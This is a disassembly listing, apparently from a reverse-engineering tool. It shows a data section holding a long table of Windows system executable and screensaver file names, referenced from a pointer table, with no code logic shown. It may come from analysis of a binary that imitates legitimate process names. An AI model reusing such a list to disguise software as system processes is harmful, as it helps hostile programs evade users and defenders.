aPoint32_exe db 'point32.exe',0 ; DATA XREF: .text:0043F5D0�o
; .text:0043F6B4�o
aJusched_exe db 'jusched.exe',0 ; DATA XREF: .text:0043F5CC�o
aHotkey_exe db 'hotkey.exe',0 ; DATA XREF: .text:0043F5C8�o
align 4
aHkcmd_exe db 'hkcmd.exe',0 ; DATA XREF: .text:0043F5C4�o
align 4
aTaskeng_exe db 'taskeng.exe',0 ; DATA XREF: .text:0043F5C0�o
aWercon_exe db 'wercon.exe',0 ; DATA XREF: .text:0043F5BC�o
align 4
aWinmgmt_exe db 'winmgmt.exe',0 ; DATA XREF: .text:0043F5B8�o
aWmiexe_exe db 'wmiexe.exe',0 ; DATA XREF: .text:0043F5B4�o
align 4
aPenservice_exe db 'penservice.exe',0 ; DATA XREF: .text:0043F5B0�o
align 4
aWudfhost_exe db 'WUDFHost.exe',0 ; DATA XREF: .text:0043F5AC�o
align 4
aInternat_exe db 'internat.exe',0 ; DATA XREF: .text:0043F5A4�o
align 4
aDevldr32_exe db 'devldr32.exe',0 ; DATA XREF: .text:0043F5A0�o
align 4
aSystem_2 db 'System',0 ; DATA XREF: .text:0043F59C�o
; .text:0043F6AC�o
align 4
aSstext3d_scr db 'sstext3d.scr',0 ; DATA XREF: .text:0043F598�o
align 4
aSsstars_scr db 'ssstars.scr',0 ; DATA XREF: .text:0043F594�o
aSspipes_scr db 'sspipes.scr',0 ; DATA XREF: .text:0043F590�o
aSsmyst_scr db 'ssmyst.scr',0 ; DATA XREF: .text:0043F58C�o
align 10h
aSsmypics_scr db 'ssmypics.scr',0 ; DATA XREF: .text:0043F588�o
align 10h
aSsmarque_scr db 'ssmarque.scr',0 ; DATA XREF: .text:0043F584�o
align 10h
aSsflwbox_scr db 'ssflwbox.scr',0 ; DATA XREF: .text:0043F580�o
align 10h
aSsbezier_scr db 'ssbezier.scr',0 ; DATA XREF: .text:0043F57C�o
align 10h
aSs3dfo_scr db 'ss3dfo.scr',0 ; DATA XREF: .text:0043F578�o
align 4
aSeismosaver_sc db 'SeismoSaver.scr',0 ; DATA XREF: .text:0043F574�o
aScrnsave_scr db 'scrnsave.scr',0 ; DATA XREF: .text:0043F570�o
align 4
aLogon_scr db 'logon.scr',0 ; DATA XREF: .text:0043F56C�o
align 4
aAcdsee_scr db 'ACDSee.scr',0 ; DATA XREF: .text:0043F568�o
align 4
aXcopy_exe db 'xcopy.exe',0 ; DATA XREF: .text:0043F564�o
align 10h
aWupdmgr_exe db 'wupdmgr.exe',0 ; DATA XREF: .text:0043F560�o
aWuauclt1_exe db 'wuauclt1.exe',0 ; DATA XREF: .text:0043F55C�o
align 4
aWuauclt_exe db 'wuauclt.exe',0 ; DATA XREF: .text:0043F558�o
aWscript_exe db 'wscript.exe',0 ; DATA XREF: .text:0043F554�o
aWscntfy_exe db 'wscntfy.exe',0 ; DATA XREF: .text:0043F550�o
aWrite_exe db 'write.exe',0 ; DATA XREF: .text:0043F54C�o
align 4
aWpnpinst_exe db 'wpnpinst.exe',0 ; DATA XREF: .text:0043F548�o
align 4
aWpabaln_exe db 'wpabaln.exe',0 ; DATA XREF: .text:0043F544�o
aWowexec_exe db 'wowexec.exe',0 ; DATA XREF: .text:0043F540�o
aWowdeb_exe db 'wowdeb.exe',0 ; DATA XREF: .text:0043F53C�o
align 10h
aWjview_exe db 'wjview.exe',0 ; DATA XREF: .text:0043F538�o
align 4
aWinver_exe db 'winver.exe',0 ; DATA XREF: .text:0043F534�o
align 4
aWinspool_exe db 'winspool.exe',0 ; DATA XREF: .text:0043F530�o
align 4
aWinmsd_exe db 'winmsd.exe',0 ; DATA XREF: .text:0043F52C�o
align 4
aWinmine_exe db 'winmine.exe',0 ; DATA XREF: .text:0043F528�o
aWinhlp32_exe db 'winhlp32.exe',0 ; DATA XREF: .text:0043F524�o
; .text:0043F6A8�o
align 10h
aWindbver_exe db 'WINDBVER.EXE',0 ; DATA XREF: .text:0043F520�o
align 10h
aWinchat_exe db 'winchat.exe',0 ; DATA XREF: .text:0043F51C�o
aWiaacmgr_exe db 'wiaacmgr.exe',0 ; DATA XREF: .text:0043F518�o
align 4
aWextract_exe db 'wextract.exe',0 ; DATA XREF: .text:0043F514�o
align 4
aW32tm_exe db 'w32tm.exe',0 ; DATA XREF: .text:0043F510�o
align 4
aVwipxspx_exe db 'vwipxspx.exe',0 ; DATA XREF: .text:0043F50C�o
align 4
aVssvc_exe db 'vssvc.exe',0 ; DATA XREF: .text:0043F508�o
align 4
aVssadmin_exe db 'vssadmin.exe',0 ; DATA XREF: .text:0043F504�o
align 4
aViral_exe db 'viral.exe',0 ; DATA XREF: .text:0043F500�o
align 10h
aVerifier_exe db 'verifier.exe',0 ; DATA XREF: .text:0043F4FC�o
align 10h
aVerclsid_exe db 'verclsid.exe',0 ; DATA XREF: .text:0043F4F8�o
align 10h
aUtilman_exe db 'utilman.exe',0 ; DATA XREF: .text:0043F4F4�o
aUsrshuta_exe db 'usrshuta.exe',0 ; DATA XREF: .text:0043F4F0�o
align 4
aUsrprbda_exe db 'usrprbda.exe',0 ; DATA XREF: .text:0043F4EC�o
align 4
aUsrmlnka_exe db 'usrmlnka.exe',0 ; DATA XREF: .text:0043F4E8�o
align 4
aUserinit_exe db 'userinit.exe',0 ; DATA XREF: .text:0043F4E4�o
align 4
aUser_exe db 'user.exe',0 ; DATA XREF: .text:0043F4E0�o
align 4
aUps_exe db 'ups.exe',0 ; DATA XREF: .text:0043F4DC�o
aUpnpcont_exe db 'upnpcont.exe',0 ; DATA XREF: .text:0043F4D8�o
align 10h
aUnlodctr_exe db 'unlodctr.exe',0 ; DATA XREF: .text:0043F4D4�o
align 10h
aTypeperf_exe db 'typeperf.exe',0 ; DATA XREF: .text:0043F4D0�o
align 10h
aTwunk_32_exe db 'twunk_32.exe',0 ; DATA XREF: .text:0043F4CC�o
; .text:0043F6A0�o
align 10h
aTwunk_16_exe db 'twunk_16.exe',0 ; DATA XREF: .text:0043F4C8�o
; .text:0043F69C�o
align 10h
aTsshutdn_exe db 'tsshutdn.exe',0 ; DATA XREF: .text:0043F4C4�o
align 10h
aTskill_exe db 'tskill.exe',0 ; DATA XREF: .text:0043F4C0�o
align 4
aTsdiscon_exe db 'tsdiscon.exe',0 ; DATA XREF: .text:0043F4BC�o
align 4
aTscupgrd_exe db 'tscupgrd.exe',0 ; DATA XREF: .text:0043F4B8�o
align 4
aTscon_exe db 'tscon.exe',0 ; DATA XREF: .text:0043F4B4�o
align 4
aTracert6_exe db 'tracert6.exe',0 ; DATA XREF: .text:0043F4B0�o
align 4
aTracert_exe db 'tracert.exe',0 ; DATA XREF: .text:0043F4AC�o
aTracerpt_exe db 'tracerpt.exe',0 ; DATA XREF: .text:0043F4A8�o
align 4
aTourstart_exe db 'tourstart.exe',0 ; DATA XREF: .text:0043F4A4�o
align 4
aTlntsvr_exe db 'tlntsvr.exe',0 ; DATA XREF: .text:0043F4A0�o
aTlntsess_exe db 'tlntsess.exe',0 ; DATA XREF: .text:0043F49C�o
align 10h
aTlntadmn_exe db 'tlntadmn.exe',0 ; DATA XREF: .text:0043F498�o
align 10h
aTftp_exe db 'tftp.exe',0 ; DATA XREF: .text:0043F494�o
align 4
aTelnet_exe db 'telnet.exe',0 ; DATA XREF: .text:0043F490�o
align 4
aTcpsvcs_exe db 'tcpsvcs.exe',0 ; DATA XREF: .text:0043F48C�o
aTcmsetup_exe db 'tcmsetup.exe',0 ; DATA XREF: .text:0043F488�o
align 4
aTaskmgr_exe db 'taskmgr.exe',0 ; DATA XREF: .text:0043F484�o
aTaskman_exe_0 db 'taskman.exe',0 ; DATA XREF: .text:0043F480�o
aTasklist_exe db 'tasklist.exe',0 ; DATA XREF: .text:0043F47C�o
; .text:off_4473CC�o ...
align 4
aTaskkill_exe db 'taskkill.exe',0 ; DATA XREF: .text:0043F478�o
align 4
aSystray_exe db 'systray.exe',0 ; DATA XREF: .text:off_432E04�o
; .text:0043F474�o
aSysteminfo_exe db 'systeminfo.exe',0 ; DATA XREF: .text:0043F470�o
align 4
aSysocmgr_exe db 'sysocmgr.exe',0 ; DATA XREF: .text:0043F46C�o
align 4
aSyskey_exe db 'syskey.exe',0 ; DATA XREF: .text:0043F468�o
align 4
aSysedit_exe db 'sysedit.exe',0 ; DATA XREF: .text:0043F464�o
aSyncapp_exe db 'syncapp.exe',0 ; DATA XREF: .text:0043F460�o
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: .text:0043F45C�o
aSubst_exe db 'subst.exe',0 ; DATA XREF: .text:0043F458�o
align 4
aSubrange_uce db 'subrange.uce',0 ; DATA XREF: .text:0043F454�o
align 4
aStimon_exe db 'stimon.exe',0 ; DATA XREF: .text:0043F450�o
align 10h
aSpupdsvc_exe db 'spupdsvc.exe',0 ; DATA XREF: .text:0043F44C�o
align 10h
aSprestrt_exe db 'sprestrt.exe',0 ; DATA XREF: .text:0043F448�o
align 10h
aSpoolsv_exe db 'spoolsv.exe',0 ; DATA XREF: .text:0043F444�o
aSpnpinst_exe db 'spnpinst.exe',0 ; DATA XREF: .text:0043F440�o
align 4
aSpiisupd_exe db 'spiisupd.exe',0 ; DATA XREF: .text:0043F43C�o
align 4
aSpider_exe db 'spider.exe',0 ; DATA XREF: .text:0043F438�o
align 4
aSort_exe db 'sort.exe',0 ; DATA XREF: .text:0043F434�o
align 4
aSol_exe db 'sol.exe',0 ; DATA XREF: .text:0043F430�o
aSndvol32_exe db 'sndvol32.exe',0 ; DATA XREF: .text:0043F42C�o
align 4
aSndrec32_exe db 'sndrec32.exe',0 ; DATA XREF: .text:0043F428�o
align 4
aSmss_exe db 'smss.exe',0 ; DATA XREF: .text:0043F424�o
align 4
aSmlogsvc_exe db 'smlogsvc.exe',0 ; DATA XREF: .text:0043F420�o
align 4
aSmbinst_exe db 'smbinst.exe',0 ; DATA XREF: .text:0043F41C�o
aSkeys_exe db 'skeys.exe',0 ; DATA XREF: .text:0043F418�o
align 10h
aSigverif_exe db 'sigverif.exe',0 ; DATA XREF: .text:0043F414�o
align 10h
aShutdown_exe db 'shutdown.exe',0 ; DATA XREF: .text:0043F410�o
align 10h
aShrpubw_exe db 'shrpubw.exe',0 ; DATA XREF: .text:0043F40C�o
aShmgrate_exe db 'shmgrate.exe',0 ; DATA XREF: .text:0043F408�o
align 4
aShare_exe db 'share.exe',0 ; DATA XREF: .text:0043F404�o
align 4
aShadow_exe db 'shadow.exe',0 ; DATA XREF: .text:0043F400�o
align 4
aSfc_exe db 'sfc.exe',0 ; DATA XREF: .text:0043F3FC�o
aSetver_exe db 'setver.exe',0 ; DATA XREF: .text:0043F3F8�o
align 4
aSetup_exe db 'setup.exe',0 ; DATA XREF: .text:0043F3F4�o
align 4
aSethc_exe db 'sethc.exe',0 ; DATA XREF: .text:0043F3F0�o
align 10h
aSessmgr_exe db 'sessmgr.exe',0 ; DATA XREF: .text:0043F3EC�o
aServices_exe db 'services.exe',0 ; DATA XREF: .text:0043F3E8�o
align 4
aSecedit_exe db 'secedit.exe',0 ; DATA XREF: .text:0043F3E4�o
aSdbinst_exe db 'sdbinst.exe',0 ; DATA XREF: .text:0043F3E0�o
aSchtasks_exe db 'schtasks.exe',0 ; DATA XREF: .text:0043F3DC�o
align 4
aScardsvr_exe db 'scardsvr.exe',0 ; DATA XREF: .text:0043F3D8�o
align 4
aSc_exe db 'sc.exe',0 ; DATA XREF: .text:0043F3D4�o
align 4
aSavedump_exe db 'savedump.exe',0 ; DATA XREF: .text:0043F3D0�o
align 4
aRwinsta_exe db 'rwinsta.exe',0 ; DATA XREF: .text:0043F3CC�o
aRunonce_exe db 'runonce.exe',0 ; DATA XREF: .text:0043F3C8�o
aRundll32_exe db 'rundll32.exe',0 ; DATA XREF: .text:0043F3C4�o
align 4
aRunas_exe db 'runas.exe',0 ; DATA XREF: .text:0043F3C0�o
align 10h
aRtlcpl_exe db 'RTLCPL.EXE',0 ; DATA XREF: .text:0043F3BC�o
; .text:0043F658�o
align 4
aRtcshare_exe db 'rtcshare.exe',0 ; DATA XREF: .text:0043F3B8�o
align 4
aRsvp_exe db 'rsvp.exe',0 ; DATA XREF: .text:0043F3B4�o
align 4
aRsopprov_exe db 'rsopprov.exe',0 ; DATA XREF: .text:0043F3B0�o
align 4
aRsnotify_exe db 'rsnotify.exe',0 ; DATA XREF: .text:0043F3AC�o
align 4
aRsmui_exe db 'rsmui.exe',0 ; DATA XREF: .text:0043F3A8�o
align 4
aRsmsink_exe db 'rsmsink.exe',0 ; DATA XREF: .text:0043F3A4�o
aRsm_exe db 'rsm.exe',0 ; DATA XREF: .text:0043F3A0�o
aRsh_exe db 'rsh.exe',0 ; DATA XREF: .text:0043F39C�o
aRoutemon_exe db 'routemon.exe',0 ; DATA XREF: .text:0043F398�o
align 10h
aRoute_exe db 'route.exe',0 ; DATA XREF: .text:0043F394�o
align 4
aRexec_exe db 'rexec.exe',0 ; DATA XREF: .text:0043F390�o
align 4
aReset_exe db 'reset.exe',0 ; DATA XREF: .text:0043F38C�o
align 4
aReplace_exe db 'replace.exe',0 ; DATA XREF: .text:0043F388�o
aRelog_exe db 'relog.exe',0 ; DATA XREF: .text:0043F384�o
align 4
aRegwiz_exe db 'regwiz.exe',0 ; DATA XREF: .text:0043F380�o
align 4
aRegsvr32_exe db 'regsvr32.exe',0 ; DATA XREF: .text:0043F37C�o
align 4
aRegini_exe db 'regini.exe',0 ; DATA XREF: .text:0043F378�o
align 4
aRegedt32_exe db 'regedt32.exe',0 ; DATA XREF: .text:0043F374�o
align 4
aRegcladm_exe db 'REGCLADM.EXE',0 ; DATA XREF: .text:0043F370�o
align 4
aReg_exe db 'reg.exe',0 ; DATA XREF: .text:0043F36C�o
aRedir_exe db 'redir.exe',0 ; DATA XREF: .text:0043F368�o
align 4
aRecover_exe db 'recover.exe',0 ; DATA XREF: .text:0043F364�o
aRdshost_exe db 'rdshost.exe',0 ; DATA XREF: .text:0043F360�o
aRdsaddin_exe db 'rdsaddin.exe',0 ; DATA XREF: .text:0043F35C�o
align 10h
aRdpclip_exe db 'rdpclip.exe',0 ; DATA XREF: .text:0043F358�o
aRcp_exe db 'rcp.exe',0 ; DATA XREF: .text:0043F354�o
aRcimlby_exe db 'rcimlby.exe',0 ; DATA XREF: .text:0043F350�o
aRasphone_exe db 'rasphone.exe',0 ; DATA XREF: .text:0043F34C�o
align 10h
aRasdial_exe db 'rasdial.exe',0 ; DATA XREF: .text:0043F348�o
aRasautou_exe db 'rasautou.exe',0 ; DATA XREF: .text:0043F344�o
align 4
aQwinsta_exe db 'qwinsta.exe',0 ; DATA XREF: .text:0043F340�o
aQprocess_exe db 'qprocess.exe',0 ; DATA XREF: .text:0043F33C�o
align 4
aQappsrv_exe db 'qappsrv.exe',0 ; DATA XREF: .text:0043F338�o
aProxycfg_exe db 'proxycfg.exe',0 ; DATA XREF: .text:0043F334�o
align 4
aProquota_exe db 'proquota.exe',0 ; DATA XREF: .text:0043F330�o
align 4
aProgman_exe db 'progman.exe',0 ; DATA XREF: .text:0043F32C�o
aPrint_exe db 'print.exe',0 ; DATA XREF: .text:0043F328�o
align 4
aPowercfg_exe db 'powercfg.exe',0 ; DATA XREF: .text:0043F324�o
align 4
aPing6_exe db 'ping6.exe',0 ; DATA XREF: .text:0043F320�o
align 4
aPing_exe db 'ping.exe',0 ; DATA XREF: .text:0043F31C�o
align 4
aPerfmon_exe db 'perfmon.exe',0 ; DATA XREF: .text:0043F318�o
aPentnt_exe db 'pentnt.exe',0 ; DATA XREF: .text:0043F314�o
align 4
aPathping_exe db 'pathping.exe',0 ; DATA XREF: .text:0043F310�o
align 4
aPackager_exe db 'packager.exe',0 ; DATA XREF: .text:0043F30C�o
align 4
aOsuninst_exe db 'osuninst.exe',0 ; DATA XREF: .text:0043F308�o
align 4
aOsk_exe db 'osk.exe',0 ; DATA XREF: .text:0043F304�o
aOpenfiles_exe db 'openfiles.exe',0 ; DATA XREF: .text:0043F300�o
align 4
aOdbcconf_exe db 'odbcconf.exe',0 ; DATA XREF: .text:0043F2FC�o
align 4
aOdbcad32_exe db 'odbcad32.exe',0 ; DATA XREF: .text:0043F2F8�o
align 4
aNwscript_exe db 'nwscript.exe',0 ; DATA XREF: .text:0043F2F4�o
align 4
aNw16_exe db 'nw16.exe',0 ; DATA XREF: .text:0043F2F0�o
align 10h
aNtvdm_exe db 'ntvdm.exe',0 ; DATA XREF: .text:0043F2EC�o
align 4
aNtsd_exe db 'ntsd.exe',0 ; DATA XREF: .text:0043F2E8�o
align 4
aNtoskrnl_exe db 'ntoskrnl.exe',0 ; DATA XREF: .text:0043F2E4�o
align 4
aNtkrnlpa_exe db 'ntkrnlpa.exe',0 ; DATA XREF: .text:0043F2E0�o
align 4
aNtbackup_exe db 'ntbackup.exe',0 ; DATA XREF: .text:0043F2DC�o
align 4
aNslookup_exe db 'nslookup.exe',0 ; DATA XREF: .text:0043F2D8�o
align 4
aNotepad_exe_0 db 'notepad.exe',0 ; DATA XREF: .text:0043F2D4�o
; .text:0043F728�o
aNlsfunc_exe db 'nlsfunc.exe',0 ; DATA XREF: .text:0043F2D0�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .text:0043F2CC�o
aNetsh_exe db 'netsh.exe',0 ; DATA XREF: .text:0043F2C8�o
align 4
aNetsetup_exe db 'netsetup.exe',0 ; DATA XREF: .text:0043F2C4�o
align 4
aNetdde_exe db 'netdde.exe',0 ; DATA XREF: .text:0043F2C0�o
align 4
aNet1_exe db 'net1.exe',0 ; DATA XREF: .text:0043F2BC�o
align 10h
aNet_exe db 'net.exe',0 ; DATA XREF: .text:0043F2B8�o
aNerocheck_exe db 'NeroCheck.exe',0 ; DATA XREF: .text:0043F2B4�o
align 4
aNddeapir_exe db 'nddeapir.exe',0 ; DATA XREF: .text:0043F2B0�o
align 4
aNbtstat_exe db 'nbtstat.exe',0 ; DATA XREF: .text:0043F2AC�o
aNarrator_exe db 'narrator.exe',0 ; DATA XREF: .text:0043F2A8�o
align 4
aMstsc_exe db 'mstsc.exe',0 ; DATA XREF: .text:0043F2A4�o
align 10h
aMstinit_exe db 'mstinit.exe',0 ; DATA XREF: .text:0043F2A0�o
aMsswchx_exe db 'msswchx.exe',0 ; DATA XREF: .text:0043F29C�o
aMspaint_exe db 'mspaint.exe',0 ; DATA XREF: .text:0043F298�o
aMsiexec_exe db 'msiexec.exe',0 ; DATA XREF: .text:0043F294�o
aMshta_exe db 'mshta.exe',0 ; DATA XREF: .text:0043F290�o
align 4
aMshearts_exe db 'mshearts.exe',0 ; DATA XREF: .text:0043F28C�o
align 4
aMsg_exe db 'msg.exe',0 ; DATA XREF: .text:0043F288�o
aMsdtc_exe db 'msdtc.exe',0 ; DATA XREF: .text:0043F284�o
align 10h
aMscdexnt_exe db 'mscdexnt.exe',0 ; DATA XREF: .text:0043F280�o
align 10h
aMrt_exe db 'MRT.exe',0 ; DATA XREF: .text:0043F27C�o
aMrinfo_exe db 'mrinfo.exe',0 ; DATA XREF: .text:0043F278�o
align 4
aMqtgsvc_exe db 'mqtgsvc.exe',0 ; DATA XREF: .text:0043F274�o
aMqsvc_exe db 'mqsvc.exe',0 ; DATA XREF: .text:0043F270�o
align 4
aMqbkup_exe db 'mqbkup.exe',0 ; DATA XREF: .text:0043F26C�o
align 4
aMpnotify_exe db 'mpnotify.exe',0 ; DATA XREF: .text:0043F268�o
align 4
aMplay32_exe db 'mplay32.exe',0 ; DATA XREF: .text:0043F264�o
aMountvol_exe db 'mountvol.exe',0 ; DATA XREF: .text:0043F260�o
align 4
aMobsync_exe db 'mobsync.exe',0 ; DATA XREF: .text:0043F25C�o
aMnmsrvc_exe db 'mnmsrvc.exe',0 ; DATA XREF: .text:0043F258�o
aMmc_exe db 'mmc.exe',0 ; DATA XREF: .text:0043F254�o
aMigpwd_exe db 'migpwd.exe',0 ; DATA XREF: .text:0043F250�o
align 10h
aMem_exe db 'mem.exe',0 ; DATA XREF: .text:0043F24C�o
aMakecab_exe db 'makecab.exe',0 ; DATA XREF: .text:0043F248�o
aMagnify_exe db 'magnify.exe',0 ; DATA XREF: .text:0043F244�o
aLsass_exe db 'lsass.exe',0 ; DATA XREF: .text:0043F240�o
align 4
aLpr_exe db 'lpr.exe',0 ; DATA XREF: .text:0043F23C�o
aLpq_exe db 'lpq.exe',0 ; DATA XREF: .text:0043F238�o
aLogonui_exe db 'logonui.exe',0 ; DATA XREF: .text:0043F234�o
aLogoff_exe db 'logoff.exe',0 ; DATA XREF: .text:0043F230�o
align 4
aLogman_exe db 'logman.exe',0 ; DATA XREF: .text:0043F22C�o
align 10h
aLogagent_exe db 'logagent.exe',0 ; DATA XREF: .text:0043F228�o
align 10h
aLodctr_exe db 'lodctr.exe',0 ; DATA XREF: .text:0043F224�o
align 4
aLocator_exe db 'locator.exe',0 ; DATA XREF: .text:0043F220�o
aLnkstub_exe db 'lnkstub.exe',0 ; DATA XREF: .text:0043F21C�o
aLights_exe db 'lights.exe',0 ; DATA XREF: .text:0043F218�o
align 10h
aLabel_exe db 'label.exe',0 ; DATA XREF: .text:0043F214�o
align 4
aKrnl386_exe db 'krnl386.exe',0 ; DATA XREF: .text:0043F210�o
aJview_exe db 'jview.exe',0 ; DATA XREF: .text:0043F20C�o
align 4
aJdbgmgr_exe db 'jdbgmgr.exe',0 ; DATA XREF: .text:0043F208�o
aJavaws_exe db 'javaws.exe',0 ; DATA XREF: .text:0043F204�o
align 4
aJavaw_exe db 'javaw.exe',0 ; DATA XREF: .text:0043F200�o
align 4
aJava_exe db 'java.exe',0 ; DATA XREF: .text:0043F1FC�o
align 4
aIpxroute_exe db 'ipxroute.exe',0 ; DATA XREF: .text:0043F1F8�o
align 4
aIpv6_exe db 'ipv6.exe',0 ; DATA XREF: .text:0043F1F4�o
align 10h
aIpsec6_exe db 'ipsec6.exe',0 ; DATA XREF: .text:0043F1F0�o
align 4
aIpconfig_exe db 'ipconfig.exe',0 ; DATA XREF: .text:0043F1EC�o
align 4
aImapi_exe db 'imapi.exe',0 ; DATA XREF: .text:0043F1E8�o
align 4
aIexpress_exe db 'iexpress.exe',0 ; DATA XREF: .text:0043F1E4�o
align 4
aIe4uinit_exe db 'ie4uinit.exe',0 ; DATA XREF: .text:0043F1E0�o
align 4
aHostname_exe db 'hostname.exe',0 ; DATA XREF: .text:0043F1DC�o
align 4
aHelp_exe db 'help.exe',0 ; DATA XREF: .text:0043F1D8�o
align 4
aGrpconv_exe db 'grpconv.exe',0 ; DATA XREF: .text:0043F1D4�o
aGpupdate_exe db 'gpupdate.exe',0 ; DATA XREF: .text:0043F1D0�o
align 10h
aGpresult_exe db 'gpresult.exe',0 ; DATA XREF: .text:0043F1CC�o
align 10h
aGetmac_exe db 'getmac.exe',0 ; DATA XREF: .text:0043F1C8�o
align 4
aGdi_exe db 'gdi.exe',0 ; DATA XREF: .text:0043F1C4�o
aGb2312_uce db 'gb2312.uce',0 ; DATA XREF: .text:0043F1C0�o
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: .text:0043F1BC�o
aFsutil_exe db 'fsutil.exe',0 ; DATA XREF: .text:0043F1B8�o
align 4
aFsquirt_exe db 'fsquirt.exe',0 ; DATA XREF: .text:0043F1B4�o
aFreecell_exe db 'freecell.exe',0 ; DATA XREF: .text:0043F1B0�o
align 10h
aForcedos_exe db 'forcedos.exe',0 ; DATA XREF: .text:0043F1AC�o
align 10h
aFontview_exe db 'fontview.exe',0 ; DATA XREF: .text:0043F1A8�o
align 10h
aFltmc_exe db 'fltMc.exe',0 ; DATA XREF: .text:0043F1A4�o
align 4
aFixmapi_exe db 'fixmapi.exe',0 ; DATA XREF: .text:0043F1A0�o
aFinger_exe db 'finger.exe',0 ; DATA XREF: .text:0043F19C�o
align 4
aFindstr_exe db 'findstr.exe',0 ; DATA XREF: .text:0043F198�o
aFind_exe db 'find.exe',0 ; DATA XREF: .text:0043F194�o
align 4
aFc_exe db 'fc.exe',0 ; DATA XREF: .text:0043F190�o
align 4
aFastopen_exe db 'fastopen.exe',0 ; DATA XREF: .text:0043F18C�o
align 4
aExtrac32_exe db 'extrac32.exe',0 ; DATA XREF: .text:0043F188�o
align 4
aExpand_exe db 'expand.exe',0 ; DATA XREF: .text:0043F184�o
align 10h
aExe2bin_exe db 'exe2bin.exe',0 ; DATA XREF: .text:0043F180�o
aEventvwr_exe db 'eventvwr.exe',0 ; DATA XREF: .text:0043F17C�o
align 4
aEventtriggers_ db 'eventtriggers.exe',0 ; DATA XREF: .text:0043F178�o
align 10h
aEventcreate_ex db 'eventcreate.exe',0 ; DATA XREF: .text:0043F174�o
aEudcedit_exe db 'eudcedit.exe',0 ; DATA XREF: .text:0043F170�o
align 10h
aEsentutl_exe db 'esentutl.exe',0 ; DATA XREF: .text:0043F16C�o
align 10h
aEdlin_exe db 'edlin.exe',0 ; DATA XREF: .text:0043F168�o
align 4
aDxdiag_exe db 'dxdiag.exe',0 ; DATA XREF: .text:0043F164�o
align 4
aDwwin_exe db 'dwwin.exe',0 ; DATA XREF: .text:0043F160�o
align 4
aDvdupgrd_exe db 'dvdupgrd.exe',0 ; DATA XREF: .text:0043F15C�o
align 4
aDvdplay_exe db 'dvdplay.exe',0 ; DATA XREF: .text:0043F158�o
aDumprep_exe db 'dumprep.exe',0 ; DATA XREF: .text:0043F154�o
aDrwtsn32_exe db 'drwtsn32.exe',0 ; DATA XREF: .text:0043F150�o
align 4
aDrwatson_exe db 'drwatson.exe',0 ; DATA XREF: .text:0043F14C�o
align 4
aDriverquery_ex db 'driverquery.exe',0 ; DATA XREF: .text:0043F148�o
aDpvsetup_exe db 'dpvsetup.exe',0 ; DATA XREF: .text:0043F144�o
align 4
aDpnsvr_exe db 'dpnsvr.exe',0 ; DATA XREF: .text:0043F140�o
align 4
aDplaysvr_exe db 'dplaysvr.exe',0 ; DATA XREF: .text:0043F13C�o
align 4
aDosx_exe db 'dosx.exe',0 ; DATA XREF: .text:0043F138�o
align 4
aDoskey_exe db 'doskey.exe',0 ; DATA XREF: .text:0043F134�o
align 10h
aDmremote_exe db 'dmremote.exe',0 ; DATA XREF: .text:0043F130�o
align 10h
aDmadmin_exe db 'dmadmin.exe',0 ; DATA XREF: .text:0043F12C�o
aDllhst3g_exe db 'dllhst3g.exe',0 ; DATA XREF: .text:0043F128�o
align 4
aDllhost_exe db 'dllhost.exe',0 ; DATA XREF: .text:0043F124�o
aDiskperf_exe db 'diskperf.exe',0 ; DATA XREF: .text:0043F120�o
align 4
aDiskpart_exe db 'diskpart.exe',0 ; DATA XREF: .text:0043F11C�o
align 4
aDiantz_exe db 'diantz.exe',0 ; DATA XREF: .text:0043F118�o
align 4
aDfrgntfs_exe db 'dfrgntfs.exe',0 ; DATA XREF: .text:0043F114�o
align 4
aDfrgfat_exe db 'dfrgfat.exe',0 ; DATA XREF: .text:0043F110�o
aDefrag_exe db 'defrag.exe',0 ; DATA XREF: .text:0043F10C�o
align 4
aDebug_exe db 'debug.exe',0 ; DATA XREF: .text:0043F108�o
align 4
aDdeshare_exe db 'ddeshare.exe',0 ; DATA XREF: .text:0043F104�o
align 4
aDcomcnfg_exe db 'dcomcnfg.exe',0 ; DATA XREF: .text:0043F100�o
align 4
aCtfmon_exe db 'ctfmon.exe',0 ; DATA XREF: .text:0043F0FC�o
align 4
aCsrss_exe db 'csrss.exe',0 ; DATA XREF: .text:0043F0F8�o
align 10h
aCscript_exe db 'cscript.exe',0 ; DATA XREF: .text:0043F0F4�o
aConvert_exe db 'convert.exe',0 ; DATA XREF: .text:0043F0F0�o
aControl_exe db 'control.exe',0 ; DATA XREF: .text:0043F0EC�o
aConime_exe db 'conime.exe',0 ; DATA XREF: .text:0043F0E8�o
align 10h
aCompact_exe db 'compact.exe',0 ; DATA XREF: .text:0043F0E4�o
aComp_exe db 'comp.exe',0 ; DATA XREF: .text:0043F0E0�o
align 4
aCmstp_exe db 'cmstp.exe',0 ; DATA XREF: .text:0043F0DC�o
align 4
aCmmon32_exe db 'cmmon32.exe',0 ; DATA XREF: .text:0043F0D8�o
aCmdl32_exe db 'cmdl32.exe',0 ; DATA XREF: .text:0043F0D4�o
align 4
aClspack_exe db 'clspack.exe',0 ; DATA XREF: .text:0043F0CC�o
aClipsrv_exe db 'clipsrv.exe',0 ; DATA XREF: .text:0043F0C8�o
aClipbrd_exe db 'clipbrd.exe',0 ; DATA XREF: .text:0043F0C4�o
aCliconfg_exe db 'cliconfg.exe',0 ; DATA XREF: .text:0043F0C0�o
align 10h
aCleanmgr_exe db 'cleanmgr.exe',0 ; DATA XREF: .text:0043F0BC�o
align 10h
aCkcnv_exe db 'ckcnv.exe',0 ; DATA XREF: .text:0043F0B8�o
align 4
aCisvc_exe db 'cisvc.exe',0 ; DATA XREF: .text:0043F0B4�o
align 4
aCipher_exe db 'cipher.exe',0 ; DATA XREF: .text:0043F0B0�o
align 4
aCidaemon_exe db 'cidaemon.exe',0 ; DATA XREF: .text:0043F0AC�o
align 4
aChkntfs_exe db 'chkntfs.exe',0 ; DATA XREF: .text:0043F0A8�o
aChkdsk_exe db 'chkdsk.exe',0 ; DATA XREF: .text:0043F0A4�o
align 4
aChcfg_exe db 'ChCfg.exe',0 ; DATA XREF: .text:0043F0A0�o
align 4
aCharmap_exe db 'charmap.exe',0 ; DATA XREF: .text:0043F09C�o
aCalc_exe db 'calc.exe',0 ; DATA XREF: .text:0043F098�o
align 10h
aCacls_exe db 'cacls.exe',0 ; DATA XREF: .text:0043F094�o
align 4
aBootvrfy_exe db 'bootvrfy.exe',0 ; DATA XREF: .text:0043F090�o
align 4
aBootok_exe db 'bootok.exe',0 ; DATA XREF: .text:0043F08C�o
align 4
